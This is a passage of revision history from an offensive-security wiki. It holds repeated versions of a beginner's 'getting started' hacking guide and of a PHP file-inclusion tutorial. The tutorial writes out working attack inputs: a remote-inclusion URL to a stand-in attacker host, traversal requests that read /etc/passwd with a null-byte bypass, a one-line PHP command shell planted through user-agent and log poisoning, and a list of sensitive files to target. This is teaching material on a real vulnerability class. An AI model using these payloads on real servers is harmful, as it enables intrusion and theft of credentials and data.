<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7738User:Hatter/getting started2012-07-01T10:36:30Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with some of the essential commands under the linux system..<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7737User:Hatter/getting started2012-07-01T10:35:36Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the[[Bash Book]], which will familiarise you with some of the essential commands under the linux system..<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7665File Inclusion2012-06-28T21:31:54Z<p>DPYJulietowbaijc: /* Useful files for LFI */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. <br />
<br />
=== Local File Disclosure ===<br />
<br />
Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
=== Code Injection ===<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ displays the user-agent of the attacker when included. As a result, when it is included the PHP code contained in the attacker's user-agent is executed. meaning that anything supplied to the page via the 'cmd' GET variable will be executed on the server with PHP's system() function, which executes commands at the OS level.<br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the error log - all requests that are denied or that lead to errors are stored in an error log. This means that if we send an illegal request containing some PHP code, the entire request (including the PHP code) will be added to the error log, which can later be included with LFI to execute our code.<br />
<br />
For example, one can use telnet command and cause a 404 error with a GET request:<br />
<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
Note that log location may vary.<br />
<br />
=== Useful files for LFI ===<br />
<br />
* /etc/passwd<br />
* /etc/group<br />
* /etc/security/passwd<br />
* /etc/security/group<br />
* apache/logs/access.log<br />
* apache/logs/error.log<br />
* /var/log/access.log<br />
* /var/log/error.log<br />
* /proc/self/cmdline<br />
* /proc/self/fd/<number><br />
* /var/apache/access_log<br />
* /var/apache/error_log<br />
* /var/log/apache/<br />
* /var/log/httpd/<br />
* /usr/local/apache/logs/<br />
* /usr/local/apache/conf/httpd.conf<br />
* /proc/<pid>/fd/<number><br />
* /proc/self/environ<br />
<br><br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7664File Inclusion2012-06-28T21:26:57Z<p>DPYJulietowbaijc: /* Local File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. <br />
<br />
=== Local File Disclosure ===<br />
<br />
Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
=== Code Injection ===<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ displays the user-agent of the attacker when included. As a result, when it is included the PHP code contained in the attacker's user-agent is executed. meaning that anything supplied to the page via the 'cmd' GET variable will be executed on the server with PHP's system() function, which executes commands at the OS level.<br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the error log - all requests that are denied or that lead to errors are stored in an error log. This means that if we send an illegal request containing some PHP code, the entire request (including the PHP code) will be added to the error log, which can later be included with LFI to execute our code.<br />
<br />
For example, one can use telnet command and cause a 404 error with a GET request:<br />
<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
Note that log location may vary.<br />
<br />
=== Useful files for LFI ===<br />
<br />
* /etc/passwd<br />
* /etc/group<br />
* /etc/security/passwd<br />
* /etc/security/group<br />
* apache/logs/access.log<br />
* apache/logs/error.log<br />
* /var/log/access.log<br />
* /var/log/error.log<br />
* /proc/self/cmdline<br />
* /proc/self/fd/<number><br />
* /var/apache/access_log<br />
* /var/apache/error_log<br />
* /var/log/apache/<br />
* /var/log/httpd/<br />
* /usr/local/apache/logs/<br />
* /usr/local/apache/conf/httpd.conf<br />
* /proc/<pid>/fd/<number><br />
* /proc/self/environ<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7663File Inclusion2012-06-28T20:59:41Z<p>DPYJulietowbaijc: G</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ displays the user-agent of the attacker when included. As a result, when it is included the PHP code contained in the attacker's user-agent is executed. meaning that anything supplied to the page via the 'cmd' GET variable will be executed on the server with PHP's system() function, which executes commands at the OS level.<br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7662File Inclusion2012-06-28T20:55:25Z<p>DPYJulietowbaijc: /* Local File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
